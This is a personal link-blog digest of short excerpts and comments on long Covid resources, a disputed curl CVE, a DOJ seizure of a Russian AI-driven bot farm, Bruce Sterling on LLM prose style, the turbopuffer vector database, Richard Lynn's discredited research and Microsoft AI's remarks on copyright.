    Navigating the complexities of long Covid can feel overwhelming amidst the sea of conflicting and misinformation. That's why we've built Long Covid The Answers: to provide clarity and credible insights. We're proud to have a Certified CPD Podcast for Educating Medical Staff. Earn certified up to 15 Mainpro+® credits for the podcast series! Earn Certified CPD credits indirectly using the site in your clinical practice. We're dedicated to providing hand-curated, credible information and relief for individuals battling Long COVID. We're proud to have a team of esteemed Doctors, Professors, Scientists, and individuals directly affected by long Covid and their caregivers onboard.
    Given the decent profile of the experts involved, this could be handy for anyone attempting to receive treatment for LC and facing ignorance from their healthcare providers.

    (tags: long-covid covid-19 medicine health)

The bogus CVE problem [LWN.net]

  • The bogus CVE problem [LWN.net]

    As curl's Daniel Stenberg writes:

    It was obvious already before that NVD really does not try very hard to actually understand or figure out the problem they grade. In this case it is quite impossible for me to understand how they could come up with this severity level. It's like they saw "integer overflow" and figure that wow, yeah that is the most horrible flaw we can imagine, but clearly nobody at NVD engaged their brains nor looked at the "vulnerable" code or the patch that fixed the bug. Anyone that looks can see that this is not a security problem.

    (tags: cve cvss infosec security-circus lwn vulnerabilities curl soc2)

DOJ seizes ‘bot farm’ operated by RT editor on behalf of the Russian government

  • DOJ seizes ‘bot farm’ operated by RT editor on behalf of the Russian government

    Lest anyone was thinking Russian bot farms were no more after the demise of Prigozhin:

    The Department of Justice announced on Tuesday that it seized two domain names and more than 900 social media accounts it claims were part of an “AI-enhanced” Russian bot farm. Many of the accounts were designed to look like they belonged to Americans and posted content about the Russia-Ukraine war, including videos in which Russian President Vladimir Putin justified Russia’s invasion of Ukraine.

    The Justice Department claims that an employee of RT — Russia’s state media outlet — was behind the bot farm. RT’s leadership signed off on a plan to use the bot farm to “distribute information on a wide-scale basis,” amplifying the publication’s reach on social media, an FBI agent alleged in an affidavit. To set up the bot farm, the employee bought two domain names from Namecheap, an Arizona-based company, that were then used to create two email servers, the affidavit claims. The servers were then used to create 968 email addresses, which were in turn used to set up social media accounts, according to the affidavit and the DOJ.

    The effort was concentrated on X, where profiles were created with Meliorator, an “AI-enabled bot farm generation and management software”. “Russia intended to use this bot farm to disseminate AI-generated foreign disinformation, scaling their work with the assistance of AI to undermine our partners in Ukraine and influence geopolitical narratives favorable to the Russian government.”
    Looks like it used a lot of now quite familiar bot attributes, such as following high-profile accounts and other bot accounts, liking other bot posts, and using AI-generated profile images. It's not clear but it sounds like the content posted is also AI-generated based on defined "personalities". More on Meliorator and the operations of this AI bot farming tool, in this Joint Advisory PDF: https://www.ic3.gov/Media/News/2024/240709.pdf

    (tags: bots russia bot-farms twitter x meliorator ai social-media spam propaganda rt ukraine)

Preliminary Notes on the Delvish Dialect, by Bruce Sterling

  • Preliminary Notes on the Delvish Dialect, by Bruce Sterling

    I’m inventing a handy neologism (as is my wont), and I’m calling all of these Large Language Model dialects “Delvish.” [...] Delvish is a language of struggle. Humans struggle to identify and sometimes to weed out texts composed in “Delvish.” Why? Because humans can deploy fast-and-cheap Delvish and then falsely claim to have laboriously written these texts with human effort, all the while demanding some expensive human credit-and-reward for this machine-generated content. Obviously this native 21st-century high-tech/lowlife misdeed is a novel form of wickedness, somehow related to plagiarism, or impersonation, or false-witness, or classroom-cheating, or “fake news,” or even dirt-simple lies and frauds, but newly chrome-plated with AI machine-jargon. These newfangled crimes need a whole set of neologisms, but in the meantime, the frowned-upon Delvish dialect is commonly Considered-Bad and is under active linguistic repression. Unwanted, spammy Delvish content has already acquired many pejorative neologisms, such as “fluff,” “machine slop,” “botshit” and “ChatGPTese.” Apparently good or bad, they’re all Delvish, though. Some “Delvish” is pretty easy to recognize, because of how it feels to the reader. The emotional affect of LLM consumer-chatbots has the tone of a servile, cringing, oddly scatterbrained university professor. This approach to the human reader is a feature, not a bug, because it is inhumanly and conspicuously “honest, helpful and harmless.”

    (tags: commentary cyberpunk language llms delvish bruce-sterling neologisms dialects)

turbopuffer

  • turbopuffer

    A new proprietary vector-search-oriented database, built statelessly on object storage (S3) with "smart caching" on SSD/RAM -- "a solution that scales effortlessly to billions of vectors and millions of tenants/namespaces". Apparently it uses a new storage engine: "an object-storage-first storage engine where object storage is the source of truth (LSM). [...] In order to optimize cold latency, the storage engine carefully handles roundtrips to object storage. The query planner and storage engine have to work in concert to strike a delicate balance between downloading more data per roundtrip, and doing multiple roundtrips (P90 to object storage is around 250ms for <1MB). For example, for a vector search query, we aim to limit it to a maximum of three roundtrips for sub-second cold latency." HN comments thread: https://news.ycombinator.com/item?id=40916786
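    As a back-of-the-envelope check on that roundtrip budget (my own illustration, using only the ~250ms P90-per-roundtrip figure quoted above; the extra overhead number is a guess):

        # Rough cold-query latency as a function of serial object-storage roundtrips,
        # using the ~250 ms P90-per-<1MB-roundtrip figure quoted above (illustrative only).
        P90_ROUNDTRIP_MS = 250
        OTHER_OVERHEAD_MS = 50  # guessed planner/compute/network overhead

        def cold_latency_ms(roundtrips: int) -> int:
            return roundtrips * P90_ROUNDTRIP_MS + OTHER_OVERHEAD_MS

        for n in range(1, 5):
            print(f"{n} roundtrip(s): ~{cold_latency_ms(n)} ms")
        # Three serial roundtrips land around 800 ms -- still sub-second, which is why
        # capping a cold vector search at three roundtrips makes sense as a target.

    It also makes clear why fewer, fatter reads can beat many small ones once every read carries a fixed quarter-second-ish cost.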

    (tags: aws s3 storage search vectors vector-search fuzzy-search lsm databases via:hn)

Journals should retract Richard Lynn’s racist ‘research’ articles

  • Journals should retract Richard Lynn's racist 'research' articles

    Richard Lynn was not the finest example of Irish science:

    Lynn, who died in 2023, was a professor at the University of Ulster and the president of the Pioneer Fund, a nonprofit foundation created in 1937 by American Nazi sympathizers to support “race betterment” and “race realism.” It has been a primary funding source of scientific racism and, for decades, Lynn was one of the loudest proponents of the unfounded idea that Western civilization is threatened by “inferior races” that are genetically predisposed to low intelligence, violence, and criminality. Lynn’s work has been repeatedly condemned by social scientists and biologists for using flawed methodology and deceptively collated data to support racism. In particular, he created deeply flawed datasets purporting to show differences in IQ culminating in a highly cited national IQ database. Many of Lynn’s papers appear in journals owned by the billion-dollar publishing giants Elsevier and Springer, including Personality and Individual Differences and Intelligence.
    The ESRI, for whom Lynn was a Research Professor in the 1960s and 70s, have quietly removed his output from their archives, thankfully. But as this article notes, his papers and faked datasets still feature in many prestigious journals. (via Ben)

    (tags: richard-lynn racists research papers elsevier iq via:bwalsh)

Three-finger salute: Hunger Games symbol adopted by Myanmar protesters

Microsoft AI CEO doesn’t understand copyright

  • Microsoft AI CEO doesn't understand copyright

    Mustafa Suleyman, the CEO of Microsoft AI, says "the social contract for content that is on the open web is that it's "freeware" for training AI models", and it "is fair use", and "anyone can copy it". As Ed Newton-Rex of Fairly Trained notes:

    This is categorically false. Content released online is still protected by copyright. You can't copy it for any purpose you like simply because it's on the open web. Creators who have been told for years to publish online, often for free, for exposure, may object to being retroactively told they were entering a social contract that let anyone copy their work.
    It's really shocking to see this. How on earth has Microsoft's legal department not hit the brakes on this?

    (tags: ai law legal ip open-source freeware fair-use copying piracy)